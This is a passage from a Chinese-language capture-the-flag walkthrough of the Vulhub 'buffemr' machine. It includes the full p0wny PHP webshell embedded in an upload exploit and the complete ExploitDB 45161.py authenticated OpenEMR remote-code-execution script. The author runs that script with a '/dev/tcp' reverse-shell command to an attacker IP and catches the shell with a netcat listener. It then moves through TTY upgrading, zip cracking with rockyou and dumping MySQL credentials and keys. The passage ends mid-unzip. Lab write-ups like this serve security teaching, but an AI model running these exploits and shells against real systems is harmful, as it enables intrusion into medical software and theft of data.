=> array('Invalid path / no write permission.'),\n            'cwd' => getcwd()\n        );\n    } else {\n        fwrite($f, base64_decode($file));\n        fclose($f);\n        return array(\n            'stdout' => array('Done.'),\n            'cwd' => getcwd()\n        );\n    }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n    $response = NULL;\n\n    switch ($_GET[\"feature\"]) {\n        case \"shell\":\n            $cmd = $_POST['cmd'];\n            if (!preg_match('/2>/', $cmd)) {\n                $cmd .= ' 2>&1';\n            }\n            $response = featureShell($cmd, $_POST[\"cwd\"]);\n            break;\n        case \"pwd\":\n            $response = featurePwd();\n            break;\n        case \"hint\":\n            $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n            break;\n        case 'upload':\n            $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n    }\n\n    header(\"Content-Type: application/json\");\n    echo json_encode($response);\n    die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n    <head>\n        <meta charset=\"UTF-8\" />\n        <title>p0wny@shell:~#</title>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n        <style>\n            html, body {\n                margin: 0;\n                padding: 0;\n                background: #333;\n                color: #eee;\n                font-family: monospace;\n            }\n\n            *::-webkit-scrollbar-track {\n                border-radius: 8px;\n                background-color: #353535;\n            }\n\n            *::-webkit-scrollbar {\n                width: 8px;\n                height: 8px;\n            }\n\n            *::-webkit-scrollbar-thumb {\n                border-radius: 8px;\n                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n                background-color: #bcbcbc;\n            }\n\n            #shell {\n                background: #222;\n                max-width: 800px;\n                margin: 50px auto 0 auto;\n                box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n                font-size: 10pt;\n                display: flex;\n                flex-direction: column;\n                align-items: stretch;\n            }\n\n            #shell-content {\n                height: 500px;\n                overflow: auto;\n                padding: 5px;\n                white-space: pre-wrap;\n                flex-grow: 1;\n            }\n\n            #shell-logo {\n                font-weight: bold;\n                color: #FF4180;\n                text-align: center;\n            }\n\n            @media (max-width: 991px) {\n                #shell-logo {\n                    font-size: 6px;\n                    margin: -25px 0;\n                }\n\n                html, body, #shell {\n                    height: 100%;\n                    width: 100%;\n                    max-width: none;\n                }\n\n                #shell {\n                    margin-top: 0;\n                }\n            }\n\n            @media (max-width: 767px) {\n                #shell-input {\n                    flex-direction: column;\n                }\n            }\n\n            @media (max-width: 320px) {\n                #shell-logo {\n                    font-size: 5px;\n                }\n            }\n\n            .shell-prompt {\n                font-weight: bold;\n                color: #75DF0B;\n            }\n\n            .shell-prompt > span {\n                color: #1BC9E7;\n            }\n\n            #shell-input {\n                display: flex;\n                box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n                border-top: rgba(255, 255, 255, .05) solid 1px;\n            }\n\n            #shell-input > label {\n                flex-grow: 0;\n                display: block;\n                padding: 0 5px;\n                height: 30px;\n                line-height: 30px;\n            }\n\n            #shell-input #shell-cmd {\n                height: 30px;\n                line-height: 30px;\n                border: none;\n                background: transparent;\n                color: #eee;\n                font-family: monospace;\n                font-size: 10pt;\n                width: 100%;\n                align-self: center;\n            }\n\n            #shell-input div {\n                flex-grow: 1;\n                align-items: stretch;\n            }\n\n            #shell-input input {\n                outline: none;\n            }\n        </style>\n\n        <script>\n            var CWD = null;\n            var commandHistory = [];\n            var historyPosition = 0;\n            var eShellCmdInput = null;\n            var eShellContent = null;\n\n            function _insertCommand(command) {\n                eShellContent.innerHTML += \"\\n\\n\";\n                eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n                eShellContent.innerHTML += escapeHtml(command);\n                eShellContent.innerHTML += \"\\n\";\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _insertStdout(stdout) {\n                eShellContent.innerHTML += escapeHtml(stdout);\n                eShellContent.scrollTop = eShellContent.scrollHeight;\n            }\n\n            function _defer(callback) {\n                setTimeout(callback, 0);\n            }\n\n            function featureShell(command) {\n\n                _insertCommand(command);\n                if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n                    featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n                } else if (/^\\s*clear\\s*$/.test(command)) {\n                    // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n                    eShellContent.innerHTML = '';\n                } else {\n                    makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n                        if (response.hasOwnProperty('file')) {\n                            featureDownload(response.name, response.file)\n                        } else {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        }\n                    });\n                }\n            }\n\n            function featureHint() {\n                if (eShellCmdInput.value.trim().length === 0) return;  // field is empty -> nothing to complete\n\n                function _requestCallback(data) {\n                    if (data.files.length <= 1) return;  // no completion\n\n                    if (data.files.length === 2) {\n                        if (type === 'cmd') {\n                            eShellCmdInput.value = data.files[0];\n                        } else {\n                            var currentValue = eShellCmdInput.value;\n                            eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n                        }\n                    } else {\n                        _insertCommand(eShellCmdInput.value);\n                        _insertStdout(data.files.join(\"\\n\"));\n                    }\n                }\n\n                var currentCmd = eShellCmdInput.value.split(\" \");\n                var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n                var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n                makeRequest(\n                    \"?feature=hint\",\n                    {\n                        filename: fileName,\n                        cwd: CWD,\n                        type: type\n                    },\n                    _requestCallback\n                );\n\n            }\n\n            function featureDownload(name, file) {\n                var element = document.createElement('a');\n                element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n                element.setAttribute('download', name);\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.click();\n                document.body.removeChild(element);\n                _insertStdout('Done.');\n            }\n\n            function featureUpload(path) {\n                var element = document.createElement('input');\n                element.setAttribute('type', 'file');\n                element.style.display = 'none';\n                document.body.appendChild(element);\n                element.addEventListener('change', function () {\n                    var promise = getBase64(element.files[0]);\n                    promise.then(function (file) {\n                        makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n                            _insertStdout(response.stdout.join(\"\\n\"));\n                            updateCwd(response.cwd);\n                        });\n                    }, function () {\n                        _insertStdout('An unknown client-side error occurred.');\n                    });\n                });\n                element.click();\n                document.body.removeChild(element);\n            }\n\n            function getBase64(file, onLoadCallback) {\n                return new Promise(function(resolve, reject) {\n                    var reader = new FileReader();\n                    reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n                    reader.onerror = reject;\n                    reader.readAsDataURL(file);\n                });\n            }\n\n            function genPrompt(cwd) {\n                cwd = cwd || \"~\";\n                var shortCwd = cwd;\n                if (cwd.split(\"/\").length > 3) {\n                    var splittedCwd = cwd.split(\"/\");\n                    shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n                }\n                return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n            }\n\n            function updateCwd(cwd) {\n                if (cwd) {\n                    CWD = cwd;\n                    _updatePrompt();\n                    return;\n                }\n                makeRequest(\"?feature=pwd\", {}, function(response) {\n                    CWD = response.cwd;\n                    _updatePrompt();\n                });\n\n            }\n\n            function escapeHtml(string) {\n                return string\n                    .replace(/&/g, \"&\")\n                    .replace(/</g, \"<\")\n                    .replace(/>/g, \">\");\n            }\n\n            function _updatePrompt() {\n                var eShellPrompt = document.getElementById(\"shell-prompt\");\n                eShellPrompt.innerHTML = genPrompt(CWD);\n            }\n\n            function _onShellCmdKeyDown(event) {\n                switch (event.key) {\n                    case \"Enter\":\n                        featureShell(eShellCmdInput.value);\n                        insertToHistory(eShellCmdInput.value);\n                        eShellCmdInput.value = \"\";\n                        break;\n                    case \"ArrowUp\":\n                        if (historyPosition > 0) {\n                            historyPosition--;\n                            eShellCmdInput.blur();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                            _defer(function() {\n                                eShellCmdInput.focus();\n                            });\n                        }\n                        break;\n                    case \"ArrowDown\":\n                        if (historyPosition >= commandHistory.length) {\n                            break;\n                        }\n                        historyPosition++;\n                        if (historyPosition === commandHistory.length) {\n                            eShellCmdInput.value = \"\";\n                        } else {\n                            eShellCmdInput.blur();\n                            eShellCmdInput.focus();\n                            eShellCmdInput.value = commandHistory[historyPosition];\n                        }\n                        break;\n                    case 'Tab':\n                        event.preventDefault();\n                        featureHint();\n                        break;\n                }\n            }\n\n            function insertToHistory(cmd) {\n                commandHistory.push(cmd);\n                historyPosition = commandHistory.length;\n            }\n\n            function makeRequest(url, params, callback) {\n                function getQueryString() {\n                    var a = [];\n                    for (var key in params) {\n                        if (params.hasOwnProperty(key)) {\n                            a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n                        }\n                    }\n                    return a.join(\"&\");\n                }\n                var xhr = new XMLHttpRequest();\n                xhr.open(\"POST\", url, true);\n                xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n                xhr.onreadystatechange = function() {\n                    if (xhr.readyState === 4 && xhr.status === 200) {\n                        try {\n                            var responseJson = JSON.parse(xhr.responseText);\n                            callback(responseJson);\n                        } catch (error) {\n                            alert(\"Error while parsing response: \" + error);\n                        }\n                    }\n                };\n                xhr.send(getQueryString());\n            }\n\n            document.onclick = function(event) {\n                event = event || window.event;\n                var selection = window.getSelection();\n                var target = event.target || event.srcElement;\n\n                if (target.tagName === \"SELECT\") {\n                    return;\n                }\n\n                if (!selection.toString()) {\n                    eShellCmdInput.focus();\n                }\n            };\n\n            window.onload = function() {\n                eShellCmdInput = document.getElementById(\"shell-cmd\");\n                eShellContent = document.getElementById(\"shell-content\");\n                updateCwd();\n                eShellCmdInput.focus();\n            };\n        </script>\n    </head>\n\n    <body>\n        <div id=\"shell\">\n            <pre id=\"shell-content\">\n                <div id=\"shell-logo\">\n        ___                         ____      _          _ _        _  _   <span></span>\n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|<span></span>\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|<span></span>\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  <span></span>\n|_|                         |___/  \\____/                                  <span></span>\n                </div>\n            </pre>\n            <div id=\"shell-input\">\n                <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n                <div>\n                    <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n                </div>\n            </div>\n        </div>\n    </body>\n\n</html>\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_dest_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_education\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"bn_save\"\r\n\r\nSave\r\n-----------------------------31900464228840324774249185339--\r\n"

# Send Exploit:
session.post(exploit_url, headers=header, data=body)

# Finish
path = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'
print('[+] Webshell: ' + path)                                        

查看帮助

                              
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 49998.py -h

 ___                   _____ __  __ ____            ____   ___   _   _____
  / _ \ _ __   ___ _ __ | ____|  \/  |  _ \          | ___| / _ \ / | |___ /
 | | | | '_ \ / _ \ '_ \|  _| | |\/| | |_) |  _____  |___ \| | | || |   |_  | |_| | |_) |  __/ | | | |___| |  | |  _ <  |_____|  ___) | |_| || |_ ___) |
  \___/| .__/ \___|_| |_|_____|_|  |_|_| \_\         |____(_)___(_)_(_)____/
       |_|

                    _____            _       _ _
                    | ____|_  ___ __ | | ___ (_) |_
                    |  _| \ \/ / '_ \| |/ _ \| | __|
                    | |___ >  <| |_) | | (_) | | |_
                    |_____/_/\_\ .__/|_|\___/|_|\__|
                               |_|


usage: 49998.py [-h] [-T IP] [-P PORT] [-U PATH] [-u USERNAME] [-p PASSWORD]

OpenEMR Remote Code Execution

options:
  -h, --help            show this help message and exit
  -T IP, --IP IP
  -P PORT, --PORT PORT
  -U PATH, --PATH PATH
  -u USERNAME, --USERNAME USERNAME
  -p PASSWORD, --PASSWORD PASSWORD

利用参数如下

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 49998.py -T 192.168.11.137 -P 80 -U '/openemr' -u 'admin' -p 'Monster123'

 ___                   _____ __  __ ____            ____   ___   _   _____
  / _ \ _ __   ___ _ __ | ____|  \/  |  _ \          | ___| / _ \ / | |___ /
 | | | | '_ \ / _ \ '_ \|  _| | |\/| | |_) |  _____  |___ \| | | || |   |_  | |_| | |_) |  __/ | | | |___| |  | |  _ <  |_____|  ___) | |_| || |_ ___) |
  \___/| .__/ \___|_| |_|_____|_|  |_|_| \_\         |____(_)___(_)_(_)____/
       |_|

                    _____            _       _ _
                    | ____|_  ___ __ | | ___ (_) |_
                    |  _| \ \/ / '_ \| |/ _ \| | __|
                    | |___ >  <| |_) | | (_) | | |_
                    |_____/_/\_\ .__/|_|\___/|_|\__|
                               |_|



[+] Authentication

[+] Uploading Webshell:
[+] Webshell: http://192.168.11.137:80/openemr/sites/default/images/shell.php

image-20240404172749943

利用失败,,,换一个试试

45161.py漏洞利用

利用最后那个RCE方式:php/webapps/45161.py

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─#  cp /usr/share/exploitdb/exploits/php/webapps/45161.py /home/hirak0/Vulhub/104/45161.py
                                                                              
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ll
总计 16
-rwxr-xr-x 1 root root 8583  4月 4日 16:48 45161.py
drwxr-xr-x 3 root root 4096  4月 4日 15:37 share
                                                                              
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cat 45161.py 
# Title: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
# Author: Cody Zacharias
# Date: 2018-08-07
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
# Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile
# Version: < 5.0.1 (Patch 4)
# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
# References:
# https://www.youtube.com/watch?v=DJSQ8Pk_7hc
'''
WARNING: This proof-of-concept exploit WILL replace the GLOBAL config.
If you don't want the OpenEMR config to be reset to default, please modify
the payload.

Example Usage:
- python openemr_rce.py http://127.0.0.1/openemr-5_0_1_3 -u admin -p admin -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'
'''

#!/usr/bin/env python

import argparse
import base64
import requests
import sys

ap = argparse.ArgumentParser(description="OpenEMR RCE")
ap.add_argument("host", help="Path to OpenEMR (Example: http://127.0.0.1/openemr).")
ap.add_argument("-u", "--user", help="Admin username")
ap.add_argument("-p", "--password", help="Admin password")
ap.add_argument("-c", "--cmd", help="Command to run.")
args = ap.parse_args()

ascii = "> .---.  ,---.  ,---.  .-. .-.,---.          ,---.    <\r\n"
ascii+= ">/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   <\r\n"
ascii+= ">| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   <\r\n"
ascii+= ">| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    <\r\n"
ascii+= ">\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   <\r\n"
ascii+= "> )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  <\r\n"
ascii+= ">(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) <\r\n"
ascii+= "                                                       \r\n"
ascii+= "   ={>   P R O J E C T    I N S E C U R I T Y   <}=    \r\n"
ascii+= "                                                       \r\n"
ascii+= "         Twitter : >@Insecurity<                       \r\n"
ascii+= "         Site    : >insecurity.sh<                     \r\n"

green = "\033[1;32m"
red = "\033[1;31m"
clear = "\033[0m"

load = "[>$<] ".replace(">", green).replace("<", clear)
err = "[>-<] ".replace(">", red).replace("<", clear)
intro = ascii.replace(">", green).replace("<", clear)

print(intro)

with requests.session() as s:
    login = {"new_login_session_management": "1",
            "authProvider": "Default",
            "authUser": args.user,
            "clearPass": args.password,
            "languageChoice": "1"
            }

    print(load + "Authenticating with " + args.user + ":" + args.password)
    r = s.post(args.host + "/interface/main/main_screen.php?auth=login&site=default", data=login)
    if "login_screen.php?error=1&site=" in r.text:
        print(err + "Failed to Login.")
        sys.exit(0)

    # This will rewrite and replace your current GLOBALS, please modify this if you don't want that.
    payload = "form_save=Save&srch_desc=&form_0=main_info.php&form_1=..%2F..%2Finterface"
    payload += "%2Fmain%2Fmessages%2Fmessages.php%3Fform_active%3D1&form_2=1&form_3=tabs_"
    payload += "style_full.css&form_4=style_light.css&form_5=__default__&form_6=__default"
    payload += "__&form_7=1&form_8=0&form_9=175&form_10=OpenEMR&form_12=1&form_13=0&form_"
    payload += "14=0&form_16=1&form_21=1&form_22=1&form_23=1&form_24=1&form_25=http%3A%2F"
    payload += "%2Fopen-emr.org%2F&form_26=&form_27=20&form_28=10&form_30=0&form_31=5&for"
    payload += "m_32=0&form_37=English+%28Standard%29&form_38=1&form_42=1&form_43=1&form_"
    payload += "44=1&form_45=1&form_46=1&form_47=1&form_48=1&form_49=1&form_50=1&form_51="
    payload += "0&form_52=0&form_53=&form_54=2&form_55=.&form_56=%2C&form_57=%24&form_58="
    payload += "0&form_59=3&form_60=6%2C0&form_61=0&form_62=0&form_63=_blank&form_69=1&fo"
    payload += "rm_70=1&form_77=1&form_79=&form_80=&form_81=&form_84=1&form_85=1&form_87="
    payload += "1&form_89=1&form_90=1&form_91=1&form_92=Y1&form_93=1&form_94=2&form_95=0&"
    payload += "form_97=14&form_98=11&form_99=24&form_100=20&form_102=1&form_103=0&form_1"
    payload += "04=0&form_105=ICD10&form_106=1&form_107=1&form_112=3&form_115=1&form_116="
    payload += "&form_119=1.00&form_121=0&form_123=&form_125=30&form_126=&form_127=60&for"
    payload += "m_128=&form_129=90&form_130=&form_131=120&form_132=&form_133=150&form_134"
    payload += "=&form_135=1&form_138=1&form_139=1&form_141=1&form_142=0&form_143=localho"
    payload += "st&form_144=&form_145=&form_146=5984&form_147=&form_150=Patient+ID+card&f"
    payload += "orm_151=Patient+Photograph&form_152=Lab+Report&form_153=Lab+Report&form_1"
    payload += "55=100&form_157=8&form_158=17&form_159=15&form_160=day&form_161=1&form_16"
    payload += "2=2&form_163=1&form_164=10&form_165=10&form_166=15&form_167=20&form_168=1"
    payload += "&form_169=%23FFFFFF&form_170=%23E6E6FF&form_171=%23E6FFE6&form_172=%23FFE"
    payload += "6FF&form_173=1&form_174=0&form_176=1&form_177=1&form_178=1&form_181=1&for"
    payload += "m_182=1&form_183=1&form_184=1&form_185=D0&form_186=D0&form_187=0%3A20&for"
    payload += "m_188=0&form_190=33&form_191=0&form_194=7200&form_198=1&form_199=0&form_2"
    payload += "00=0&form_202=&form_203=&form_204=365&form_205=&form_206=1&form_208=&form"
    payload += "_210=&form_211=&form_212=&form_213=&form_214=&form_215=&form_216=SMTP&for"
    payload += "m_217=localhost&form_218=25&form_219=&form_220=&form_221=&form_222=50&for"
    payload += "m_223=50&form_224=&form_225=&form_226=&form_227=50&form_228=&form_229=&fo"
    payload += "rm_230=&form_231=1&form_232=1&form_233=1&form_234=1&form_235=1&form_236=1"
    payload += "&form_237=1&form_238=1&form_239=Model+Registry&form_240=125789123&form_24"
    payload += "1=1&form_242=1&form_243=1&form_244=&form_245=&form_246=1&form_247=1&form_"
    payload += "248=1&form_249=5&form_250=1&form_252=1&form_253=1&form_254=1&form_255=1&f"
    payload += "orm_256=1&form_257=1&form_258=1&form_262=&form_263=6514&form_264=&form_26"
    payload += "5=&form_267=1&form_268=0&form_269=%2Fusr%2Fbin&form_270=%2Fusr%2Fbin&form"
    payload += "_271=%2Ftmp&form_272=%2Ftmp&form_273=26&form_274=state&form_275=1&form_27"
    payload += "6=26&form_277=country&form_278=lpr+-P+HPLaserjet6P+-o+cpi%3D10+-o+lpi%3D6"
    payload += "+-o+page-left%3D72+-o+page-top%3D72&form_279=&form_280=&form_282=2018-07-"
    payload += "23&form_283=1&form_285=%2Fvar%2Fspool%2Fhylafax&form_286=enscript+-M+Lett"
    payload += "er+-B+-e%5E+--margins%3D36%3A36%3A36%3A36&form_288=%2Fmnt%2Fscan_docs&for"
    payload += "m_290=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fportal&form_292=1&form_"
    payload += "296=https%3A%2F%2Fyour_web_site.com%2Fopenemr%2Fpatients&form_297=1&form_"
    payload += "299=&form_300=&form_301=&form_302=https%3A%2F%2Fssh.mydocsportal.com%2Fpr"
    payload += "ovider.php&form_303=https%3A%2F%2Fssh.mydocsportal.com&form_305=https%3A%"
    payload += "2F%2Fyour_cms_site.com%2F&form_306=&form_307=&form_308=0&form_309=https%3"
    payload += "A%2F%2Fhapi.fhir.org%2FbaseDstu3%2F&form_312=https%3A%2F%2Fsecure.newcrop"
    payload += "accounts.com%2FInterfaceV7%2FRxEntry.aspx&form_313=https%3A%2F%2Fsecure.n"
    payload += "ewcropaccounts.com%2Fv7%2FWebServices%2FUpdate1.asmx%3FWSDL%3Bhttps%3A%2F"
    payload += "%2Fsecure.newcropaccounts.com%2Fv7%2FWebServices%2FPatient.asmx%3FWSDL&fo"
    payload += "rm_314=21600&form_315=21600&form_316=&form_317=&form_318=&form_319=1&form"
    payload += "_324=&form_325=0&form_327=137&form_328=7C84773D5063B20BC9E41636A091C6F17E"
    payload += "9C1E34&form_329=C36275&form_330=0&form_332=https%3A%2F%2Fphimail.example."
    payload += "com%3A32541&form_333=&form_334=&form_335=admin&form_336=5&form_339=1&form"
    payload += "_346=LETTER&form_347=30&form_348=30&form_349=72&form_350=30&form_351=P&fo"
    payload += "rm_352=en&form_353=LETTER&form_354=5&form_355=5&form_356=5&form_357=8&for"
    payload += "m_358=D&form_359=1&form_360=9&form_361=1&form_362=104.775&form_363=241.3&"
    payload += "form_364=14&form_365=65&form_366=220"

    p = {}
    for c in payload.replace("&", "\n").splitlines():
        a = c.split("=")
        p.update({a[0]: a[1]})

    # Linux only, but can be easily modified for Windows.
    _cmd = "|| echo " + base64.b64encode(args.cmd) + "|base64 -d|bash"
    p.update({"form_284": _cmd})

    print(load + "Injecting payload")
    s.post(args.host + "/interface/super/edit_globals.php", data=p)
    sp = s.get(args.host + "/interface/main/daemon_frame.php") # M4tt D4em0n w0z h3r3 ;PpPpp
    if sp.status_code == 200:
        print(load + "Payload executed")                                                                              
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 45161.py
usage: 45161.py [-h] [-u USER] [-p PASSWORD] [-c CMD] host
45161.py: error: the following arguments are required: host
                                                                              
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# python 45161.py -h
usage: 45161.py [-h] [-u USER] [-p PASSWORD] [-c CMD] host

OpenEMR RCE

positional arguments:
  host                  Path to OpenEMR (Example: http://127.0.0.1/openemr).

options:
  -h, --help            show this help message and exit
  -u USER, --user USER  Admin username
  -p PASSWORD, --password PASSWORD
                        Admin password
  -c CMD, --cmd CMD     Command to run.

这里使用参数如下,注意使用python2

python2 45161.py http://192.168.11.137/openemr -u admin -p Monster123 -c 'bash -i >& /dev/tcp/192.168.11.130/6666 0>&1'

同时kali上监听6666端口

nc -lvvp 6666

image-20240404165343309

2.4 权限提升

2.4.1 提权至buffemr

信息收集一波,先升级一下TTY

www-data@buffemr:/var/www/html/openemr/interface/main$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ain$ python3 -c 'import pty;pty.spawn("/bin/bash")' 
www-data@buffemr:/var/www/html/openemr/interface/main$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@buffemr:/var/www/html/openemr/interface/main$ cd /h
cd /home/
www-data@buffemr:/home$ ls
ls
buffemr
www-data@buffemr:/home$ cd buffemr
cd buffemr
bash: cd: buffemr: Permission denied

这个账户的权限太低了,得想办法先提权到buffemr再提权到root

挨个目录先看看,哪些目录有权限进去

先看看tmp有什么临时文件

www-data@buffemr:/$ ls tmp/
ls tmp/
wrtFdHflK  wrtmf8FWf
www-data@buffemr:/$ cat tmp/wrtFdHflK
cat tmp/wrtFdHflK
<?php /* Smarty version 2.6.31, created on 2024-04-04 04:06:12
         compiled from default/views/day/default.html */ ?>
    <?php if ($this->_tpl_vars['PRINT_VIEW'] == 1): ?>
        <?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day_print/outlook_ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
 ?>
    <?php else: ?>
        <?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day/ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
 ?>
    <?php endif; ?>www-data@buffemr:/$ 

www-data@buffemr:/$ cat tmp/wrtmf8FWf         
cat tmp/wrtmf8FWf
<?php /* Smarty version 2.6.31, created on 2024-04-04 04:10:07
         compiled from default/views/day/default.html */ ?>
    <?php if ($this->_tpl_vars['PRINT_VIEW'] == 1): ?>
        <?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day_print/outlook_ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
 ?>
    <?php else: ?>
        <?php $_smarty_tpl_vars = $this->_tpl_vars;
$this->_smarty_include(array('smarty_include_tpl_file' => ($this->_tpl_vars['TPL_NAME'])."/views/day/ajax_template.html", 'smarty_include_vars' => array()));
$this->_tpl_vars = $_smarty_tpl_vars;
unset($_smarty_tpl_vars);
 ?>
    <?php endif; ?>www-data@buffemr:/$ 

再看看var目录下

www-data@buffemr:/$ ls var/
ls var/
backups  crash  local  log   metrics  run   spool  user.zip
cache    lib    lock   mail  opt      snap  tmp    www

该目录有一个user.zip,下载下来看看

www-data@buffemr:/$ python3 -m http.server 8888
python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.11.130 - - [04/Apr/2024 05:15:50] code 404, message File not found
192.168.11.130 - - [04/Apr/2024 05:15:50] "GET /user.zip HTTP/1.1" 404 -
192.168.11.130 - - [04/Apr/2024 05:16:27] "GET /var/user.zip HTTP/1.1" 200 -

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# wget http://192.168.11.137:8888/var/user.zip
--2024-04-04 17:16:29--  http://192.168.11.137:8888/var/user.zip
正在连接 192.168.11.137:8888... 已连接。已发出 HTTP 请求,正在等待回应... 200 OK
长度:309 [application/zip]
正在保存至: “user.zip”

user.zip                                           100%[==============================================================================================================>]     309  --.-KB/s  用时 0.008s  

2024-04-04 17:16:29 (36.6 KB/s) - 已保存 “user.zip” [309/309])

解压发现需要密码

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# unzip user.zip  
Archive:  user.zip
[user.zip] user.lst password: 

fcrackzip工具爆破一下看看

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user.zip 

换个思路,看看监听端口,发现3306是开着的

image-20240404173245698

那咱们可以试着登录一下看看,刚好前边拿到账户密码了

$host   = 'localhost';
$port   = '3306';
$login  = 'openemruser';
$pass   = 'openemruser123456';
$dbase  = 'openemr';
www-data@buffemr:/$ mysql -uopenemruser -popenemruser123456
mysql -uopenemruser -popenemruser123456
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 845
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| openemr            |
| user_info          |
+--------------------+
3 rows in set (0.01 sec)

mysql> use user_info;
use user_info;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------+
| Tables_in_user_info |
+---------------------+
| ENCKEYS             |
+---------------------+
1 row in set (0.00 sec)

mysql> select * from ENCKEYS;
select * from ENCKEYS;
+------+--------+----------------------+
| id   | name   | ENC                  |
+------+--------+----------------------+
|    1 | pdfkey | c2FuM25jcnlwdDNkCg== |
+------+--------+----------------------+
1 row in set (0.01 sec)

这里拿到一个pdfkeyc2FuM25jcnlwdDNkCg==

看着像是base64编码后的字符串,这里解码一下得到san3ncrypt3d

拿去解压user.zip发现解密失败

拿去ssh登录一下看看,也失败了,,

拿原值去解压一下user.zip试试

┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# unzip user.zip
Archive:  user.zip
